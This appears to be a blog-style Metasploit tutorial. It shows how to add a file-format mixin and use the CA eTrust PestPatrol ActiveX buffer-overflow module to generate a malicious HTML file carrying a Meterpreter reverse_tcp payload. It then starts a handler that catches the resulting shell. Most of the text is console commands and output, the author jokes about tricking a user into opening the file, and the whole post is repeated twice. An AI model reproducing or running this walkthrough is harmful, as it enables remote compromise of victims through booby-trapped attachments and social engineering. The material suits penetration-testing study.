Client-side attacks are where its at and being able to send a legitimate looking file to a user to do their double-clicky thing on is the bomb.
MC has released a FileFormat mixin for metasploit which allows you to exploit fun bugs like 08-011 and other bugs that involve a user opening some sort of attachment.
Here is the link the fileformat mixin
http://www.metasploit.com/users/mc/rand/fileformat.rb
To use it, you need to add:
require 'msf/core/exploit/fileformat' to msf3/lib/msf/core/exploit.rb
and stick fileformat.rb in the msf3/lib/msf/core/exploit/ directory
Now remembering my previous post on adding exploits to metasploit we can do the same for mixins.
so my exploit.rb file actually said:
require '/home/cg/.msf3/lib/msf/core/exploit/fileformat'
And don't worry, if you jacked something up Metasploit will let you know.
cg@WPAD:~/evil/msf3$ ./msfconsole
./lib/msf/core/exploit.rb:241:in `require': no such file to load --
/home/cg/.msf3/lib/msf/core/exploit/fileformat (LoadError)
For our example we'll use a vulnerability in the ActiveX control for eTrust PestScan
http://www.metasploit.com/users/mc/rand/etrust_pestscan.rb
From the description in the module:
This module exploits a stack overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.
Example Time!
msf > use exploit/windows/fileformat/etrust_pestscan
msf exploit(etrust_pestscan) > info
Name: CA eTrust PestPatrol ActiveX Control Buffer Overflow
Version: $Revision:$
Platform: Windows
Privileged: No
License: Metasploit Framework License
Provided by:
MC
Available targets:
Id Name
-- ----
0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME MSF no The file name.
Payload information:
Space: 1024
Avoid: 1 characters
Description:
This module exploits a stack overflow in CA eTrust PestPatrol. When
sending an overly long string to the Initialize() property of
ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary
code. This control is not marked safe for scripting, so choose your
attack vector accordingly.
References:
http://www.w00t-shell.net/#
http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm
msf exploit(etrust_pestscan) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME MSF no The file name.
Exploit target:
Id Name
-- ----
0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7
msf exploit(etrust_pestscan) > set FILENAME DEMO.html
FILENAME => DEMO.html
msf exploit(etrust_pestscan) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(etrust_pestscan) > set LHOST 192.168.0.101
LHOST => 192.168.0.101
msf exploit(etrust_pestscan) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME DEMO.html no The file name.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
DLL /home/cg/evil/msf3/data/meterpreter/metsrv.dll yes The local path to the DLL to upload
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.0.101 yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7
msf exploit(etrust_pestscan) > exploit
[*] Started reverse handler
[*] Creating HTML file ...
[*] File is located in ./data/exploits/ ...
msf exploit(etrust_pestscan) >
Fileformat bugs are going to you to require to run the multi/handler so you can catch the return shells.
cg@WPAD:~/evil/msf3$ ./msfcli
Usage: ./msfcli [mode]
====================================================
Mode Description
---- -----------
(H)elp You're looking at it baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
cg@WPAD:~/evil/msf3$ ./msfcli exploit/multi/handler
PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.0.101 E
[*] Started reverse handler
[*] Starting the payload handler...
***Work your magic to get the client to open the html file***
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.103:4360)
meterpreter >
MC has released a FileFormat mixin for metasploit which allows you to exploit fun bugs like 08-011 and other bugs that involve a user opening some sort of attachment.
Here is the link the fileformat mixin
http://www.metasploit.com/users/mc/rand/fileformat.rb
To use it, you need to add:
require 'msf/core/exploit/fileformat' to msf3/lib/msf/core/exploit.rb
and stick fileformat.rb in the msf3/lib/msf/core/exploit/ directory
Now remembering my previous post on adding exploits to metasploit we can do the same for mixins.
so my exploit.rb file actually said:
require '/home/cg/.msf3/lib/msf/core/exploit/fileformat'
And don't worry, if you jacked something up Metasploit will let you know.
cg@WPAD:~/evil/msf3$ ./msfconsole
./lib/msf/core/exploit.rb:241:in `require': no such file to load --
/home/cg/.msf3/lib/msf/core/exploit/fileformat (LoadError)
For our example we'll use a vulnerability in the ActiveX control for eTrust PestScan
http://www.metasploit.com/users/mc/rand/etrust_pestscan.rb
From the description in the module:
This module exploits a stack overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.
Example Time!
msf > use exploit/windows/fileformat/etrust_pestscan
msf exploit(etrust_pestscan) > info
Name: CA eTrust PestPatrol ActiveX Control Buffer Overflow
Version: $Revision:$
Platform: Windows
Privileged: No
License: Metasploit Framework License
Provided by:
MC
Available targets:
Id Name
-- ----
0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME MSF no The file name.
Payload information:
Space: 1024
Avoid: 1 characters
Description:
This module exploits a stack overflow in CA eTrust PestPatrol. When
sending an overly long string to the Initialize() property of
ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary
code. This control is not marked safe for scripting, so choose your
attack vector accordingly.
References:
http://www.w00t-shell.net/#
http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm
msf exploit(etrust_pestscan) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME MSF no The file name.
Exploit target:
Id Name
-- ----
0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7
msf exploit(etrust_pestscan) > set FILENAME DEMO.html
FILENAME => DEMO.html
msf exploit(etrust_pestscan) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(etrust_pestscan) > set LHOST 192.168.0.101
LHOST => 192.168.0.101
msf exploit(etrust_pestscan) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME DEMO.html no The file name.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
DLL /home/cg/evil/msf3/data/meterpreter/metsrv.dll yes The local path to the DLL to upload
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.0.101 yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7
msf exploit(etrust_pestscan) > exploit
[*] Started reverse handler
[*] Creating HTML file ...
[*] File is located in ./data/exploits/ ...
msf exploit(etrust_pestscan) >
Fileformat bugs are going to you to require to run the multi/handler so you can catch the return shells.
cg@WPAD:~/evil/msf3$ ./msfcli
Usage: ./msfcli
====================================================
Mode Description
---- -----------
(H)elp You're looking at it baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
cg@WPAD:~/evil/msf3$ ./msfcli exploit/multi/handler
PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.0.101 E
[*] Started reverse handler
[*] Starting the payload handler...
***Work your magic to get the client to open the html file***
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.103:4360)
meterpreter >